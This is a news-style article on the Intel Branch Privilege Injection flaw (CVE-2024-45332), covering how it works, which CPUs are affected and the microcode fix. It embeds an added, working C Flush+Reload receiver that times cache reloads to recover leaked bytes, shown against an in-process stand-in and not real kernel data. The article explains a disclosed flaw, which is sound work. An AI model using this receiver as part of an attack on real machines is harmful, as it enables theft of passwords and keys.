
A research team from ETH Zurich has uncovered a new microarchitectural vulnerability affecting all modern Intel processors from the ninth generation onward. The flaw, named Branch Privilege Injection and tracked as CVE-2024-45332, allows a local attacker to read privileged memory, including operating system kernel data, passwords, cryptographic keys, and the memory of other processes.
The issue lies in the branch prediction machinery, specifically the Branch Target Buffer (BTB) and the Indirect Branch Predictor (IBP), which speeds up execution by guessing where a branch will go before the branch is resolved. The processor executes instructions along the guessed path speculatively and discards their architectural results if the guess turns out to be wrong, but microarchitectural traces of that execution, such as cache fills, remain. ETH Zurich showed that predictor updates are not synchronised with the instructions that cause them: under certain conditions an update lands only after the instruction stream has already crossed a privilege boundary, so the update is attributed to the wrong privilege level. The researchers describe this as a branch predictor race condition.
Around a switch between user and kernel mode, such as a system call, there is therefore a brief window in which a predictor entry trained from user space is tagged as belonging to the kernel. Hardware Spectre v2 mitigations such as eIBRS rely on the predictor keeping user and kernel entries apart, so an entry mislabelled this way is not filtered out. This lets an attacker steer an indirect branch inside the kernel to a target of their choosing, trigger transient execution of protected code, and leak data through a side channel.
The researchers built an exploit that trains the predictor so that, during a system call, the processor speculatively jumps to a preselected code sequence in the kernel, a "gadget". The gadget runs transiently in kernel context and performs a memory access whose address depends on the secret; the cache line it touches survives the rollback, and the attacker recovers the secret byte from user space by timing which line is now cached.
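The last step, turning a secret-dependent cache access into a byte, is the part of the attack that runs entirely in user space. The following C program is an added example, not part of the article or of the ETH Zurich proof-of-concept: a Flush+Reload receiver. The speculative kernel gadget is replaced by an ordinary in-process load of the probe line selected by a constructed sample byte, so the program demonstrates only the cache side channel, not the predictor injection. It uses the x86 `clflush` and `rdtscp` intrinsics and compiles to a no-signal stub on other architectures; the one-page stride, the calibration loop count and the retry cap are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>          /* _mm_clflush, _mm_mfence, __rdtscp */
#define HAVE_X86_CACHE_PRIMITIVES 1
#endif

#define PAGE_BYTES 4096
#define NVALUES    256

/* One page per possible byte value: the "gadget" touches exactly one of these
   lines, and page spacing keeps the hardware prefetcher from pulling in neighbours. */
static uint8_t probe[NVALUES * PAGE_BYTES] __attribute__((aligned(PAGE_BYTES)));

/* Evict one probe line from every cache level (no-op on non-x86 builds). */
static void flush_line(volatile uint8_t *p) {
#ifdef HAVE_X86_CACHE_PRIMITIVES
    _mm_clflush((const void *)p);
    _mm_mfence();                       /* clflush is only ordered by a fence */
#else
    (void)p;
#endif
}

/* Cycles taken to load one byte; a cache hit is far cheaper than a DRAM fetch.
   Returns 0 where no timer primitive is available, so decoding yields "no signal". */
static uint64_t timed_load(volatile uint8_t *p) {
#ifdef HAVE_X86_CACHE_PRIMITIVES
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;                           /* volatile read: the load is really issued */
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
#else
    (void)p;
    return 0;
#endif
}

/* Decode a reload sweep: the single value whose line came back faster than
   `threshold` cycles is the leaked byte. Zero hits means the gadget did not run;
   several hits mean noise (an interrupt, a context switch) and the round repeats. */
int decode_hit(const uint64_t times[NVALUES], uint64_t threshold) {
    int hit = -1;
    for (int i = 0; i < NVALUES; i++) {
        if (times[i] < threshold) {
            if (hit != -1) return -1;   /* ambiguous: more than one line is hot */
            hit = i;
        }
    }
    return hit;
}

/* Hit/miss threshold for this machine: midpoint between the fastest cached load
   and the fastest load after a flush. 100 iterations is an assumed sample size. */
uint64_t calibrate_threshold(void) {
    volatile uint8_t *p = &probe[0];
    uint64_t min_hit = UINT64_MAX, min_miss = UINT64_MAX;
    for (int r = 0; r < 100; r++) {
        (void)*p;                       /* warm the line */
        uint64_t t = timed_load(p);
        if (t < min_hit) min_hit = t;
        flush_line(p);
        t = timed_load(p);
        if (t < min_miss) min_miss = t;
    }
    return (min_hit + min_miss) / 2;
}

/* One Flush+Reload round. The speculative kernel gadget is stood in for by an
   ordinary in-process load of probe[secret * PAGE_BYTES]; the flush and the timed
   reload sweep are exactly what the attacker's user-space receiver does. */
int leak_one_byte(uint8_t secret, uint64_t threshold, uint64_t times[NVALUES]) {
    for (int i = 0; i < NVALUES; i++)
        flush_line(&probe[i * PAGE_BYTES]);

    volatile uint8_t *gadget_line = &probe[secret * PAGE_BYTES];
    (void)*gadget_line;                 /* the secret-dependent access */

    /* Reload in a scrambled order (167 is odd, so k*167+13 mod 256 is a permutation)
       so the sweep itself does not train the stride prefetcher. */
    for (int k = 0; k < NVALUES; k++) {
        int i = (k * 167 + 13) & 0xff;
        times[i] = timed_load(&probe[i * PAGE_BYTES]);
    }
    return decode_hit(times, threshold);
}

int main(void) {
    uint64_t times[NVALUES];
    uint64_t threshold = calibrate_threshold();
    if (threshold == 0) { puts("no x86 timing primitives on this build"); return 0; }
    printf("hit/miss threshold: %llu cycles\n", (unsigned long long)threshold);
    const char *sample = "shadow";      /* constructed stand-in for kernel data */
    for (const char *s = sample; *s; s++) {
        int got = -1;
        for (int tries = 0; tries < 50 && got == -1; tries++)   /* retry cap is an assumption */
            got = leak_one_byte((uint8_t)*s, threshold, times);
        if (got < 0) puts("no clean signal after 50 rounds");
        else printf("leaked 0x%02x ('%c')\n", got, got);
    }
    return 0;
}
```

Build with `cc -O2 -o flush_reload flush_reload.c` and run on an x86 machine. In the real attack the reload sweep follows the system call that triggers the mispredicted branch, and the gadget's access happens only transiently, so a large fraction of rounds return no clean signal; that is why the proof-of-concept below is characterised by a leak rate and an accuracy figure rather than a perfect dump.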
An experimental proof-of-concept demonstrated the ability to read the “/etc/shadow” file on Ubuntu 24.04, even with security mitigations enabled. The leak rate reached 5.6 KB/s with an accuracy of 99.8%.
The vulnerability affects all Intel CPUs from the ninth generation onward, including Coffee Lake, Comet Lake, Rocket Lake, Alder Lake, and Raptor Lake. The researchers also found that the Indirect Branch Prediction Barrier (IBPB) could be bypassed on seventh-generation Kaby Lake processors. Older architectures were not tested; because they lack Enhanced IBRS (eIBRS), the researchers expect them to remain exposed to classic Spectre v2-style attacks in any case.
The team also examined Arm Cortex-X1 and Cortex-A76 cores and AMD Zen 4 and Zen 5 processors. None of them showed the asynchronous predictor update behaviour, so they are not affected by CVE-2024-45332.
Although the proof-of-concept attack targets Linux, the flaw is in the hardware, so the same behaviour can be exploited under Windows or any other operating system running on an affected CPU. Intel was notified in September 2024 and has since released microcode updates for the affected models.
According to Intel, the microcode mitigation costs roughly 2.7% in performance, while software-based defenses cost between 1.6% and 8.3% depending on the processor. The practical risk to most users remains low, since the attacker must already be running code on the target machine and the attack has to be tuned to the specific CPU. The fix is delivered as a CPU microcode update, which reaches a system either through a BIOS/UEFI update or through the operating system's early microcode loader, so users are strongly advised to install both the latest firmware and the latest operating system updates.
Full details of the attack are scheduled to be presented at USENIX Security 2025. In an official statement, Intel expressed its gratitude to the ETH Zurich team for the coordinated disclosure and emphasized that no real-world exploitation of CVE-2024-45332 has been observed to date.